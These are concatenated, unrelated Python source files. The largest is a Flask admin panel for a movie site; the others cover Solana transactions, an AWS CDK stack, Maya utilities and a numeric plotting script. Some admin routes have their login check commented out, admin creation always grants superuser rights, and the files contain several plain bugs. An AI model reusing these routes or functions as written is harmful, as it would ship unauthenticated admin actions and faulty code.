redirect(url_for("admin.tag_add"))
return render_template("admin/tag_add.html", form=form)
@admin.route("/tag/list/<int:page>/", methods=["GET"])
@admin_login_req
def tag_list(page=None):
"""
标签列表
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = Tag.query.order_by(
Tag.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("admin/tag_list.html", page_data=page_data)
@admin.route("/tag/edit/<int:id>", methods=["GET", "POST"])
@admin_login_req
# @admin_auth
def tag_edit(id=None):
"""
标签编辑
"""
g.logo = "mtianyan.jpg"
form = TagForm()
form.submit.label.text = "修改"
tag = Tag.query.get_or_404(id)
if form.validate_on_submit():
data = form.data
tag_count = Tag.query.filter_by(name=data["name"]).count()
# 说明已经有这个标签了,此时向添加一个与其他标签重名的标签。
if tag.name != data["name"] and tag_count == 1:
flash("标签已存在", "err")
return redirect(url_for("admin.tag_edit", id=tag.id))
tag.name = data["name"]
db.session.add(tag)
db.session.commit()
flash("标签修改成功", "ok")
redirect(url_for("admin.tag_edit", id=tag.id))
return render_template("admin/tag_edit.html", form=form, tag=tag)
@admin.route("/tag/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def tag_del(id=None):
"""
标签删除
"""
tag = Tag.query.filter_by(id=id).first_or_404()
db.session.delete(tag)
db.session.commit()
flash("标签<<{0}>>删除成功".format(tag.name), "ok")
return redirect(url_for("admin.tag_list", page=1))
@admin.route("/movie/add/", methods=["GET", "POST"])
@admin_login_req
def movie_add():
"""
添加电影页面
"""
form = MovieForm()
if form.validate_on_submit():
data = form.data
file_url = secure_filename(form.url.data.filename)
file_logo = secure_filename(form.logo.data.filename)
if not os.path.exists(app.config["M_DIR"]):
# 创建一个多级目录
os.makedirs(app.config["M_DIR"])
os.chmod(app.config["M_DIR"], "rw")
url = change_filename(file_url)
logo = change_filename(file_logo)
# 保存
form.url.data.save(app.config["M_DIR"] + url)
form.logo.data.save(app.config["M_DIR"] + logo)
# url,logo为上传视频,图片之后获取到的地址
movie = Movie(
title=data["title"],
url=url,
info=data["info"],
logo=logo,
star=int(data["star"]),
playnum=0,
commentnum=0,
tag_id=int(data["tag_id"]),
area=data["area"],
release_0time=data["release_time"],
length=data["length"]
)
db.session.add(movie)
db.session.commit()
flash("添加电影成功!", "ok")
return redirect(url_for('admin.movie_add'))
g.logo = "mtianyan.jpg"
return render_template("admin/movie_add.html", form=form)
@admin.route("/movie/list/<int:page>/", methods=["GET"])
@admin_login_req
def movie_list(page=None):
"""
电影列表页面
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
# 进行关联Tag的查询,单表查询使用filter_by 多表查询使用filter进行关联字段的声明
page_data = Movie.query.join(Tag).filter(
Tag.id == Movie.tag_id
).order_by(
Movie.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/movie_list.html", page_data=page_data)
@admin.route("/movie/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def movie_edit(id=None):
"""
编辑电影页面
"""
return 'movie/edit'
@admin.route("/movie/del/<int:id>/", methods=["GET"])
@admin_login_req
def movie_del(id=None):
"""
电影删除
"""
return 'movie/del'
@admin.route("/preview/add/", methods=["GET", "POST"])
@admin_login_req
def preview_add():
"""
上映预告添加
"""
g.logo = "mtianyan.jpg"
form = PreviewForm()
if form.validate_on_submit():
data = form.data
file_logo = secure_filename(form.logo.data.filename)
if not os.path.exists(app.config["P_DIR"]):
os.makedirs(app.config["P_DIR"])
# os.chmod(app.config["P_DIR"], "rw")
logo = change_filename(file_logo)
form.logo.data.save(app.config["P_DIR"] + logo)
preview = Preview(
title=data["title"],
logo=logo
)
db.session.add(preview)
db.session.commit()
flash("添加预告成功!", "ok")
return redirect(url_for('admin.preview_add'))
return render_template("admin/preview_add.html", form=form)
@admin.route("/preview/list/<int:page>/", methods=["GET"])
@admin_login_req
def preview_list(page=None):
"""
上映预告列表
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = Preview.query.order_by(
Preview.addtime.desc()
).paginate(page=page, per_page=5)
return render_template("admin/preview_list.html", page_data=page_data)
@admin.route("/preview/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def preview_edit(id):
"""
编辑预告
"""
g.logo = "mtianyan.jpg"
form = PreviewForm()
# 下面这行代码禁用编辑时的提示:封面不能为空
form.logo.validators = []
preview = Preview.query.get_or_404(int(id))
if request.method == "GET":
form.title.data = preview.title
if form.validate_on_submit():
data = form.data
if form.logo.data != "":
file_logo = secure_filename(form.logo.data.filename)
preview.logo = change_filename(file_logo)
form.logo.data.save(app.config["P_DIR"] + preview.logo)
preview.title = data["title"]
db.session.add(preview)
db.session.commit()
flash("修改预告成功!", "ok")
return redirect(url_for('admin.preview_edit', id=id))
return render_template("admin/preview_edit.html", form=form, preview=preview)
@admin.route("/preview/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def preview_del(id=None):
"""
预告删除
"""
return 'preview/del'
@admin.route("/user/list/<int:page>/", methods=["GET"])
@admin_login_req
def user_list(page=None):
"""
会员列表
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = User.query.order_by(
User.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/user_list.html", page_data=page_data)
@admin.route("/user/view/<int:id>/", methods=["GET"])
@admin_login_req
def user_view(id=None):
"""
查看会员详情
"""
from_page = request.args.get('fp')
if not from_page:
from_page = 1
user = User.query.get_or_404(int(id))
return render_template("admin/user_view.html", user=user, from_page=from_page)
@admin.route("/user/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def user_del(id=None):
"""
删除会员
"""
# 因为删除当前页。假如是最后一页,这一页已经不见了。回不到。
from_page = int(request.args.get('fp')) - 1
# 此处考虑全删完了,没法前挪的情况,0被视为false
if not from_page:
from_page = 1
user = User.query.get_or_404(int(id))
db.session.delete(user)
db.session.commit()
flash("删除会员成功!", "ok")
return redirect(url_for('admin.user_list', page=from_page))
@admin.route("/comment/list/<int:page>/", methods=["GET"])
@admin_login_req
def comment_list(page=None):
"""
评论列表
"""
if page is None:
page = 1
# 通过评论join查询其相关的movie,和相关的用户。
# 然后过滤出其中电影id等于评论电影id的电影,和用户id等于评论用户id的用户
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == Comment.movie_id,
User.id == Comment.user_id
).order_by(
Comment.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/comment_list.html", page_data=page_data)
@admin.route("/comment/del/<int:id>/", methods=["GET"])
@admin_login_req
def comment_del(id=None):
"""
删除评论
"""
# 因为删除当前页。假如是最后一页,这一页已经不见了。回不到。
from_page = int(request.args.get('fp')) - 1
# 此处考虑全删完了,没法前挪的情况,0被视为false
if not from_page:
from_page = 1
comment = Comment.query.get_or_404(int(id))
db.session.delete(comment)
db.session.commit()
flash("删除评论成功!", "ok")
return redirect(url_for('admin.comment_list', page=from_page))
@admin.route("/moviecol/list/<int:page>/", methods=["GET"])
@admin_login_req
def moviecol_list(page=None):
"""
电影收藏
"""
if page is None:
page = 1
page_data = Moviecol.query.join(
Movie
).join(
User
).filter(
Movie.id == Moviecol.movie_id,
User.id == Moviecol.user_id
).order_by(
Moviecol.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/moviecol_list.html", page_data=page_data)
@admin.route("/moviecol/del/<int:id>/", methods=["GET"])
@admin_login_req
def moviecol_del(id=None):
"""
收藏删除
"""
# 因为删除当前页。假如是最后一页,这一页已经不见了。回不到。
from_page = int(request.args.get('fp')) - 1
# 此处考虑全删完了,没法前挪的情况,0被视为false
if not from_page:
from_page = 1
moviecol = Moviecol.query.get_or_404(int(id))
db.session.delete(moviecol)
db.session.commit()
flash("删除收藏成功!", "ok")
return redirect(url_for('admin.moviecol_list', page=from_page))
@admin.route("/oplog/list/<int:page>/", methods=["GET"])
@admin_login_req
def oplog_list(page=None):
"""
操作日志管理
"""
if page is None:
page = 1
page_data = Oplog.query.join(
Admin
).filter(
Admin.id == Oplog.admin_id,
).order_by(
Oplog.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("admin/oplog_list.html", page_data=page_data)
@admin.route("/adminloginlog/list/<int:page>/", methods=["GET"])
@admin_login_req
def adminloginlog_list(page=None):
"""
管理员登录日志
"""
if page is None:
page = 1
page_data = Adminlog.query.join(
Admin
).filter(
Admin.id == Adminlog.admin_id,
).order_by(
Adminlog.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/adminloginlog_list.html", page_data=page_data)
@admin.route("/userloginlog/list/<int:page>/", methods=["GET"])
@admin_login_req
def userloginlog_list(page=None):
"""
会员登录日志列表
"""
if page is None:
page = 1
page_data = Userlog.query.join(
User
).filter(
User.id == Userlog.user_id,
).order_by(
Userlog.addtime.desc()
).paginate(page=page, per_page=2)
return render_template("admin/userloginlog_list.html", page_data=page_data)
@admin.route("/auth/add/", methods=["GET", "POST"])
@admin_login_req
def auth_add():
"""
添加权限
"""
form = AuthForm()
if form.validate_on_submit():
data = form.data
auth = Auth(
name=data["name"],
url=data["url"]
)
db.session.add(auth)
db.session.commit()
flash("添加权限成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/auth_add.html", form=form)
@admin.route("/auth/list/<int:page>/", methods=["GET"])
# @admin_login_req
def auth_list(page=None):
"""
权限列表
"""
if page is None:
page = 1
page_data = Auth.query.order_by(
Auth.addtime.desc()
).paginate(page=page, per_page=10)
g.logo = "mtianyan.jpg"
return render_template("admin/auth_list.html", page_data=page_data)
@admin.route("/auth/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
# @admin_auth
def auth_edit(id=None):
"""
编辑权限
"""
return 'auth/edit'
@admin.route("/auth/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def auth_del(id=None):
"""
权限删除
"""
return 'auth/del'
@admin.route("/role/add/", methods=["GET", "POST"])
# @admin_login_req
def role_add():
"""
角色添加
"""
form = RoleForm()
if form.validate_on_submit():
data = form.data
role = Role(
name=data["name"],
auths=",".join(map(lambda v: str(v), data["auths"]))
)
db.session.add(role)
db.session.commit()
flash("添加角色成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/role_add.html", form=form)
@admin.route("/role/list/<int:page>/", methods=["GET"])
# @admin_login_req
def role_list(page=None):
"""
角色列表
"""
if page is None:
page = 1
page_data = Role.query.order_by(
Role.addtime.desc()
).paginate(page=page, per_page=10)
g.logo = "mtianyan.jpg"
return render_template("admin/role_list.html", page_data=page_data)
@admin.route("/role/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def role_edit(id=None):
"""
编辑角色
"""
return 'role/edit'
@admin.route("/role/del/<int:id>/", methods=["GET"])
@admin_login_req
def role_del(id=None):
"""
删除角色
"""
return 'role/del'
@admin.route("/admin/add/", methods=["GET", "POST"])
@admin_login_req
def admin_add():
"""
添加管理员
"""
form = AdminForm()
from werkzeug.security import generate_password_hash
if form.validate_on_submit():
data = form.data
admin = Admin(
name=data["name"],
pwd=generate_password_hash(data["pwd"]),
role_id=data["role_id"],
is_super=1
)
db.session.add(admin)
db.session.commit()
flash("添加管理员成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/admin_add.html", form=form)
@admin.route("/admin/list/<int:page>/", methods=["GET"])
@admin_login_req
def admin_list(page=None):
"""
管理员列表
"""
if page is None:
page = 1
page_data = Admin.query.join(
Role
).filter(
Role.id == Admin.role_id
).order_by(
Admin.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/admin_list.html", page_data=page_data) |
from anthill.framework.forms import Form
from anthill.framework.utils.translation import translate as _
|
from unittest import TestCase
import requests
class EmailTest(TestCase):
@classmethod
def setUpClass(cls):
cls.request = requests.Session()
cls._url = 'http://localhost:8000/api/v1/email/'
def test_email_valid(self):
data = {
"email": "[email protected]",
"name": "Aradhya"
}
response = self.request.post(self._url, data=data)
self.assertEqual(response.status_code, 201)
def test_email_invalid(self):
data = {
"email": "testemail",
"name": "someone"
}
response = self.request.post(self._url, data=data)
self.assertEqual(response.status_code, 400)
def tearDown(self):
pass
|
from __future__ import annotations
from dataclasses import dataclass
from base58 import b58encode
from .keypair import Keypair
from .publickey import PublicKey
from nacl.signing import VerifyKey
from nacl.exceptions import BadSignatureError
from .core.instructions import Instruction, AccountMeta
from .core.message import (
Message,
MessageHeader,
CompiledInstruction,
encode_length
)
PACKET_DATA_SIZE = 1232
@dataclass
class PKSigPair:
public_key: PublicKey
signature: bytes | None = None
class Transaction:
def __init__(self, **config):
self.fee_payer: PublicKey = config.get("fee_payer")
self.nonce_info = config.get("nonce_info")
self.recent_blockhash = config.get("recent_blockhash")
self.signers: list[Keypair] = config.get("signers")
self.instructions: list[Instruction] = []
self.signatures: list[PKSigPair] = []
if "instructions" in config:
instructions: Instruction = config.get("instructions")
if (
type(instructions) is list and
isinstance(instructions[0], Instruction)
):
self.instructions.extend(config["instructions"])
else:
raise TypeError((
"instructions keyword argument"
"must be a list of Instruction objects"
))
def compile_transaction(self) -> Message:
if self.nonce_info:
self.recent_blockhash = self.nonce_info.nonce
if not self.instructions:
raise AttributeError("No instructions provided.")
if not self.recent_blockhash:
raise AttributeError("Recent blockhash not provided.")
if not self.signatures:
raise AttributeError("No signatures found in the transaction.")
if not self.fee_payer:
self.fee_payer = self.signatures[0].public_key
account_metas: list[AccountMeta] = []
program_ids: list[str] = []
for instruction in self.instructions:
if not instruction.program_id:
raise AttributeError(
"Invalid instruction (no program ID found): ",
instruction
)
account_metas.extend(instruction.keys)
if str(instruction.program_id) not in program_ids:
program_ids.append(str(instruction.program_id))
for program_id in program_ids:
account_metas.append(AccountMeta(
public_key=PublicKey(program_id),
is_signer=False,
is_writable=False
))
account_metas.sort(key=lambda account: (
not account.is_signer, not account.is_writable))
fee_payer_idx = 0
seen: dict[str, int] = {}
uniq_metas: list[AccountMeta] = []
for sig in self.signatures:
public_key = str(sig.public_key)
if public_key in seen:
uniq_metas[seen[public_key]].is_signer = True
else:
uniq_metas.append(AccountMeta(sig.public_key, True, True))
seen[public_key] = len(uniq_metas) - 1
if sig.public_key == self.fee_payer:
fee_payer_idx = min(fee_payer_idx, seen[public_key])
for a_m in account_metas:
public_key = str(a_m.public_key)
if public_key in seen:
idx = seen[public_key]
uniq_metas[idx].is_writable = uniq_metas[idx].is_writable or a_m.is_writable
else:
uniq_metas.append(a_m)
seen[public_key] = len(uniq_metas) - 1
if a_m.public_key == self.fee_payer:
fee_payer_idx = min(fee_payer_idx, seen[public_key])
if fee_payer_idx == 1:
uniq_metas = [AccountMeta(self.fee_payer, True, True)] + uniq_metas
else:
uniq_metas = (
[uniq_metas[fee_payer_idx]] + uniq_metas[:fee_payer_idx] +
uniq_metas[fee_payer_idx + 1:]
)
signed_keys: list[str] = []
unsigned_keys: list[str] = []
num_required_signatures = num_readonly_signed_accounts = num_readonly_unsigned_accounts = 0
for a_m in uniq_metas:
if a_m.is_signer:
signed_keys.append(str(a_m.public_key))
num_required_signatures += 1
num_readonly_signed_accounts += int(not a_m.is_writable)
else:
num_readonly_unsigned_accounts += int(not a_m.is_writable)
unsigned_keys.append(str(a_m.public_key))
if not self.signatures:
self.signatures = [PKSigPair(public_key=PublicKey(
key), signature=None) for key in signed_keys]
account_keys: list[str] = signed_keys + unsigned_keys
account_indices: dict[str, int] = {
str(key): i for i, key in enumerate(account_keys)}
compiled_instructions: list[CompiledInstruction] = [
CompiledInstruction(
accounts=[account_indices[str(a_m.public_key)]
for a_m in instr.keys],
program_id_index=account_indices[str(instr.program_id)],
data=b58encode(instr.data),
)
for instr in self.instructions
]
message: Message = Message(
MessageHeader(
num_required_signatures=num_required_signatures,
num_readonly_signed_accounts=num_readonly_signed_accounts,
num_readonly_unsigned_accounts=num_readonly_unsigned_accounts,
),
account_keys,
compiled_instructions,
self.recent_blockhash,
)
serialized_message: bytes = message.serialize()
return serialized_message
def sign(self) -> None:
def to_public_key(signer: PublicKey | Keypair) -> PublicKey:
if isinstance(signer, Keypair):
return signer.public_key
elif isinstance(signer, PublicKey):
return signer
else:
raise TypeError(("The argument must be either "
"PublicKey or Keypair object."))
pk_sig_pairs: list[PKSigPair] = [PKSigPair(
public_key=to_public_key(signer)
) for signer in self.signers]
self.signatures = pk_sig_pairs
sign_data = self.compile_transaction()
for idx, signer in enumerate(self.signers):
signature = signer.sign(sign_data).signature
if len(signature) != 64:
raise RuntimeError(
"Signature has invalid length: ",
signature
)
self.signatures[idx].signature = signature
def verify_signatures(self, signed_data: bytes | None = None) -> bool:
if signed_data is None:
signed_data: bytes = self.compile_transaction()
for sig_pair in self.signatures:
if not sig_pair.signature:
return False
try:
VerifyKey(bytes(sig_pair.public_key)).verify(
signed_data, sig_pair.signature)
except BadSignatureError:
return False
return True
def serialize(self) -> bytes:
if not self.signatures:
raise AttributeError("Transaction has not been signed.")
sign_data: bytes = self.compile_transaction()
if not self.verify_signatures(sign_data):
raise AttributeError("Transaction has not been signed correctly.")
if len(self.signatures) >= 64 * 4:
raise AttributeError("Too many signatures to encode.")
wire_transaction = bytearray()
signature_count = encode_length(len(self.signatures))
wire_transaction.extend(signature_count)
for sig_pair in self.signatures:
if sig_pair.signature and len(sig_pair.signature) != 64:
raise RuntimeError(
"Signature has invalid length: ", sig_pair.signature
)
if not sig_pair.signature:
wire_transaction.extend(bytearray(64))
else:
wire_transaction.extend(sig_pair.signature)
wire_transaction.extend(bytearray(sign_data))
if len(wire_transaction) > PACKET_DATA_SIZE:
raise RuntimeError(
"Transaction too large: ",
len(wire_transaction)
)
return bytes(wire_transaction)
def add_instructions(self, *instructions: Instruction) -> None:
for instr in instructions:
if not isinstance(instr, Instruction):
raise ValueError(
"Argument not an instruction object: ",
instr
)
self.instructions.append(instr)
|
from json import load
import pip._vendor.requests as requests
from aws_cdk import (
core,
aws_ec2 as ec2,
aws_iam as iam,
aws_route53 as r53
)
# this ami for ap-northeats-1 region .
# amzn-ami-hvm-2016.09.0.20160923-x86_64-gp2
# find your computer public ip .
external_ip = requests.get('https://checkip.amazonaws.com').text.rstrip()
# need to change your host_zone .
my_hosted_zone = "ZZZZZZZZ_HOST_ZONE_ID"
# need to change your zone_name .
my_zone_name = "ROUTE53_DOMAIN_ID"
# this is your computer public ip .
your_public_ip = str(external_ip + "/32")
# need to change your ec2 key_pair
my_key_pair = "eksworker"
with open("./user_data/user_data_system_manager.sh") as f:
userdata = f.read()
class VpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# The code that defines your stack goes here
# vpc = ec2.Vpc.from_lookup(self,'vpc',vpc_name="eksctl-Cloudteam-cluster/VPC" )
prj_name = self.node.try_get_context("token")
shellCommands = ec2.UserData.for_linux()
shellCommands.add_commands("yum update -y")
shellCommands.add_commands("yum install docker -y")
shellCommands.add_commands("usermod -aG dokcer ec2-user")
shellCommands.add_commands("systemctl start docker")
shellCommands.add_commands("systemctl enable docker")
shellCommands.add_commands(
"docker run -d -v /home/ec2-user/.gitlab-runner:/etc/gitlab-runner -v /var/run/docker.sock:/var/run/docker.sock --name gitlab-runner-register gitlab/gitlab-runner:alpine register --non-interactive --url https://gitlab.com./ --registration-token " + prj_name + " --docker-volumes \"/var/run/docker.sock:/var/run/docker.sock\" --executor docker --docker-image \"alpine:latest\" --description \"Docker Runner\" --tag-list \"demo,runner,cdk\" --docker-privileged")
shellCommands.add_commands(
"sleep 2 && docker run -d -v /home/ec2-user/.gitlab-runner:/etc/gitlab-runner -v /var/run/docker.sock:/var/run/docker.sock --name gitlab-runner gitlab/gitlab-runner:alpine")
vpc = ec2.Vpc.from_lookup(self, 'vpc', is_default=True)
newSG = ec2.SecurityGroup(self, 'Webec2SG', vpc=vpc, security_group_name="Webec2SG",
description="for aws cdk python lab create webec2 SG")
newSG.add_ingress_rule(peer=ec2.Peer.ipv4(
your_public_ip), connection=ec2.Port.tcp(22))
newSG.add_ingress_rule(peer=ec2.Peer.any_ipv4(),
connection=ec2.Port.tcp(80))
newSG.add_ingress_rule(peer=ec2.Peer.any_ipv4(),
connection=ec2.Port.tcp(443))
# aws linux 2
# newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
# key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2", user_data=ec2.UserData.custom(userdata)))
newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2",
user_data=shellCommands))
# ubuntu 16.04
# newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
# key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="ubuntu/images/hvm-ssd/ubuntu-xenial-16.04-amd64-server-20200407", user_data=ec2.UserData.custom(userdata)))
newec2.role.add_managed_policy(
iam.ManagedPolicy.from_aws_managed_policy_name("AmazonSSMManagedInstanceCore"))
neweip = ec2.CfnEIP(self, "EIP", domain=vpc.vpc_id, tags=[core.CfnTag(
key="Name", value="WEBEC2EIP")], instance_id=newec2.instance_id)
# search my route53 HostedZone.
zone = r53.HostedZone.from_hosted_zone_attributes(
self, 'MYHOSTED_ZONE', hosted_zone_id=my_hosted_zone, zone_name=my_zone_name)
# target neweip .
newdomain = r53.ARecord(self, "Route53NewArecord", zone=zone,
target=r53.RecordTarget.from_ip_addresses(neweip.ref), record_name="cdk-demo", ttl=core.Duration.minutes(5))
core.CfnOutput(self, 'domainname', value=newdomain.domain_name)
core.CfnOutput(self, 'hosted_zone', value=zone.zone_name)
core.CfnOutput(self, 'ec2-public-ip',
value=newec2.instance_public_dns_name)
core.CfnOutput(self, 'vpc-id', value=vpc.vpc_id)
core.CfnOutput(self, 'sg-id', value=newSG.security_group_id)
core.CfnOutput(self, 'instance-id', value=newec2.instance_id)
core.CfnOutput(self, 'local-az',
value=newec2.instance.availability_zone)
core.CfnOutput(self, 'subnet-id', value=newec2.instance.subnet_id)
core.CfnOutput(self, 'region', value=self.region)
|
from maya.api import OpenMaya
from mango.vendor import apiundo
def execute_modifier(modifier):
"""
Execute a modifier object. After this the apiundo package is used to
ensure that the command is undo/redo-able within Maya.
:param OpenMaya.MDGModifier/OpenMaya.MDagModifier modifier:
"""
modifier.doIt()
apiundo.commit(undo=modifier.undoIt, redo=modifier.doIt)
class MDGModifier(object):
def __init__(self):
self._modifier = OpenMaya.MDGModifier()
def __enter__(self):
return self._modifier
def __exit__(self, exc_type, exc_val, exc_tb):
execute_modifier(self._modifier)
class MDagModifier(object):
def __init__(self):
self._modifier = OpenMaya.MDagModifier()
def __enter__(self):
return self._modifier
def __exit__(self, exc_type, exc_val, exc_tb):
execute_modifier(self._modifier)
def get_object(node):
"""
:param str node:
:return: Maya object node
:rtype: OpenMaya.MObject
"""
sel = OpenMaya.MSelectionList()
sel.add(node)
return sel.getDependNode(0)
def get_plug(node):
"""
:param str node:
:return: Maya plug node
:rtype: OpenMaya.MPlug
"""
sel = OpenMaya.MSelectionList()
sel.add(node)
return sel.getPlug(0)
def create_node(node_type, name=None, parent=None):
"""
:param str node_type:
:param str/None name:
:param str/OpenMaya.MObject/None parent:
:return: Node
:rtype: OpenMaya.MObject
"""
# convert parent
if not parent:
parent = OpenMaya.MObject.kNullObj
elif not isinstance(parent, OpenMaya.MObject):
parent = get_object(parent)
# create node
try:
rename_children = True
modifier = OpenMaya.MDagModifier()
m_object = modifier.createNode(node_type, parent)
except TypeError:
rename_children = False
modifier = OpenMaya.MDGModifier()
m_object = modifier.createNode(node_type)
# rename node
if name:
modifier.renameNode(m_object, name)
# execute modifier, this needs to happen now as other wise no shape nodes
# exist and the shapes will not be renamed. The renaming of the shapes
# will be wrapped in a different modifier.
execute_modifier(modifier)
# rename node shapes
if name and rename_children:
with MDGModifier() as modifier:
m_dag_path = OpenMaya.MDagPath.getAPathTo(m_object)
for index in range(m_dag_path.childCount()):
modifier.renameNode(
m_dag_path.child(index),
"{}Shape#".format(name)
)
return m_object
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
plt.clf()
plt.close('all')
y = np.linspace(-4,4,1000)
lam0 = np.float(1e-1)
lam1 = np.float(1)
lam2 = np.float(1e1)
###############################################################################
f1 = np.max([np.zeros_like(y), 1.-y], axis=0)
def fy1(lam):
fy1_lam = np.zeros_like(y)
for i, yi in enumerate(y):
if yi < 1-lam:
fy1_lam[i] = 1. - yi - 0.5*lam
if yi >= 1-lam and yi < 1:
fy1_lam[i] = 1./(lam*2.)*(yi-1)**2
if yi >= 1:
fy1_lam[i] = 0
return fy1_lam
fy1_lam0 = fy1(lam0)
fy1_lam1 = fy1(lam1)
fy1_lam2 = fy1(lam2)
###############################################################################
f2 = np.abs(y) + (np.abs(y)**3) / 3.
def fy2(lam):
fy2_lam = np.zeros_like(y)
def tmp_plus(yii):
return -(1.0/lam)/2.0 + (((1.0/lam)/2.)**2. - (1.0 - (yii/lam)))**0.5
def tmp_minus(yii):
return -(-1.0/lam)/2. - (((-1.0/lam)/2.)**2. - (1.0 + (yi/lam)))**0.5
for i, yi in enumerate(y):
if yi > lam:
y1 = tmp_plus(yi)
fy2_lam[i] = y1 + (y1**3.0)/3.0 + (np.linalg.norm(yi - y1)**2.)/(2.*lam)
elif -lam <= yi and yi <= lam:
fy2_lam[i] = (yi**2.)/(2.*lam)
elif yi < lam:
y1 = tmp_minus(yi)
fy2_lam[i] = -y1 + ((-y1)**3.0)/3.0 + (np.linalg.norm(yi - y1)**2.)/(2.*lam)
return fy2_lam
fy2_lam0 = fy2(lam0)
fy2_lam1 = fy2(lam1)
fy2_lam2 = fy2(lam2)
###############################################################################
f3 = np.zeros_like(y)
inf = 20.
a = -2.
b = 2.
for i, yi in enumerate(y):
if yi >= a and yi <= b:
f3[i] = 0
else:
f3[i] = inf
def fy3(lam):
fy3_lam = np.zeros_like(y)
frac_l = 1./(2.*lam)
for i, yi in enumerate(y):
if yi < a:
fy3_lam[i] = frac_l * np.linalg.norm(yi-a)**2
if yi >= a and yi <= b:
fy3_lam[i] = 0
if yi > b:
fy3_lam[i] = frac_l * np.linalg.norm(yi-b)**2
return fy3_lam
fy3_lam0 = fy3(lam0)
fy3_lam1 = fy3(lam1)
fy3_lam2 = fy3(lam2)
###############################################################################
f4 = np.max([np.abs(y), (np.abs(y)**2)],axis=0)
def fy4(lam):
fy4_lam = np.zeros_like(y)
lam2 = (2*lam)
def f(yi, lam):
(yi/(2*lam+1))**2 + np.linalg.norm(y[i]*(1-(1/(2*lam+1))))**2 / lam2
for i, yi in enumerate(y):
if yi >= 2.*lam + 1:
fy4_lam[i] = f(yi,lam)
if yi <= -2*lam - 1:
fy4_lam[i] = f(yi,lam)
if yi < 1 + 2*lam and yi >= 1+lam:
fy4_lam[i] = 1 + np.linalg.norm(yi - 1)**2 / lam2
if yi > -1 - 2*lam and yi <= -1-lam:
fy4_lam[i] = 1 + np.linalg.norm(yi + 1)**2 / lam2
if yi < 1+ lam and yi >= lam:
fy4_lam[i] = np.abs(y[i]-lam) + lam/2.
if yi > -1- lam and yi <= -lam:
fy4_lam[i] = np.abs(y[i]+lam) + lam/2.
if yi < lam and yi > -lam:
fy4_lam[i] = np.linalg.norm(yi)**2 / lam2
return fy4_lam
fy4_lam0 = fy4(lam0)
fy4_lam1 = fy4(lam1)
fy4_lam2 = fy4(lam2)
def plot_functions(fyx_lambda_x, fct_name):
plt.figure()
plt.title(fct_name)
plt.plot(y, fyx_lambda_x[0], label=fct_name)
plt.plot(y, fyx_lambda_x[1], '--', label='lambda=0.1')
plt.plot(y, fyx_lambda_x[2], '--', label='lambda=1')
plt.plot(y, fyx_lambda_x[3], '--', label='lambda=10')
plt.xlabel("y")
plt.grid()
plt.legend()
plt.savefig('ass3_description/'+fct_name+'.png')
plt.show()
plot_functions([f1, fy1_lam0, fy1_lam1, fy1_lam2], 'f1(y)')
plot_functions([f2, fy2_lam0, fy2_lam1, fy2_lam2], 'f2(y)')
plot_functions([f3, fy3_lam0, fy3_lam1, fy3_lam2], 'f3(y)')
plot_functions([f4, fy4_lam0, fy4_lam1, fy4_lam2], 'f4(y)')
|
# -*- coding: utf-8 -*-
from ucloud.core.exc._exc import (
UCloudException,
ValidationException,
RetCodeException,
RetryTimeoutException,
)
__all__ = [
"UCloudException",
"ValidationException",
"RetCodeException",
"RetryTimeoutException",
]
|
import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE',
'pytopo.settings')
app = Celery('pytopo')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) |
import logging
import math
import numpy as np
#TODO: Remove this line
from PySide.QtGui import QGraphicsPolygonItem, QImage
from PySide.QtGui import QColor, QGraphicsPixmapItem, QPixmap
from PySide.QtCore import QPoint, QPointF, Qt
from traits.api import Bool, Enum, DelegatesTo, Dict, HasTraits, Instance, Int, List, WeakRef, on_trait_change
from arrview import settings
from arrview.colormapper import ArrayPixmap
from arrview.roi import ROI, ROIManager
from arrview.slicer import Slicer
from arrview.tools.base import GraphicsTool, GraphicsToolFactory, MouseState
from arrview.tools.paintbrush import PaintBrushItem
log = logging.getLogger(__name__)
_paintbrush_z = 100
_foreground_roi_z = 11
_background_roi_z = 10
def _pixmap_to_ndarray(pixmap, alpha_threshold=0):
"""Convert a pixmap to a ndarray mask
Parameters
----------
pixmap : QPixmap
